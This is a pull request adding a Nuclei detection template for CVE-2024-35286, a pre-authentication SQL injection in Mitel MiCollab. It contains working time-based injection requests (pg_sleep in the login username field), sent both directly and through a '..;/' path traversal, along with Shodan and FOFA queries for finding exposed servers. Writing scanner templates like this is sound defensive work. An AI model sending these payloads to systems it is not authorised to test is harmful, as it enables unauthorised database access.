### PR TITLE
CVE-2024-35286 - Mitel MiCollab - SQL Injection 💰 #13054

### DIFF
--- a/http/cves/2024/CVE-2024-35286.yaml
+++ b/http/cves/2024/CVE-2024-35286.yaml
@@ -1,0 +1,76 @@
+id: CVE-2024-35286
+
+info:
+  name: Mitel MiCollab NuPoint Messenger - Pre-Auth SQL Injection
+  author: ImBIOS
+  severity: critical
+  description: |
+    A SQL injection vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab through 9.8.0.33 allows an unauthenticated attacker to execute arbitrary database operations. A reachable time-based injection exists in the hidden `/npm-admin` login endpoint, which can be accessed via Tomcat context traversal using `..;/`.
+  reference:
+    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-24-0014
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-35286
+    - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/
+  classification:
+    cve-id: CVE-2024-35286
+    cwe-id: CWE-89
+    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+  metadata:
+    verified: false
+    max-request: 2
+    vendor: mitel
+    product: micollab
+    shodan-query: http.favicon.hash:-1922044295
+    fofa-query: icon_hash="-1922044295"
+  tags: cve,cve2024,mitel,micollab,sqli,time-based-sqli,kev
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/portal/"
+
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(to_lower(body), "micollab end user portal", "mitel_logo", "micollab")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 20s
+        POST /npm-admin/login.do HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        subAction=basicLogin&username=admin'||pg_sleep(6)--&password=admin&clusterIndex=0
+
+      - |
+        @timeout: 20s
+        POST /npm-pwg/..;/npm-admin/login.do HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        subAction=basicLogin&username=admin'||pg_sleep(6)--&password=admin&clusterIndex=0
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: dsl
+        name: direct
+        dsl:
+          - 'duration_1>=6'
+          - 'status_code_1 != 404'
+        condition: and
+      - type: dsl
+        name: traversal
+        dsl:
+          - 'duration_2>=6'
+          - 'status_code_2 != 404'
+        condition: and
+


### PR DESCRIPTION
### Template / PR Information

- Add CVE-2024-35286 Mitel MiCollab NuPoint Messenger pre-auth SQL injection (time-based) targeting `/npm-admin/login.do` (direct) and via `..;/` traversal.
- References:
  - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-24-0014
  - https://nvd.nist.gov/vuln/detail/CVE-2024-35286
  - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/

/claim #13054
fixes #13054

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO


#### Additional Details (leave it blank if not applicable)

- Shodan / FOFA Queries:
  - Shodan: `http.favicon.hash:"-1922044295"`
  - FOFA: `"MiCollab End User Portal"`
- Notes:
  - Uses time-based PgSQL `pg_sleep(6)` with duration matcher.
  - Includes both direct `/npm-admin/login.do` and `..;/` traversal variant `/npm-pwg/..;/npm-admin/login.do`.
  - Fingerprints MiCollab via `/portal/` to reduce false positives.

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

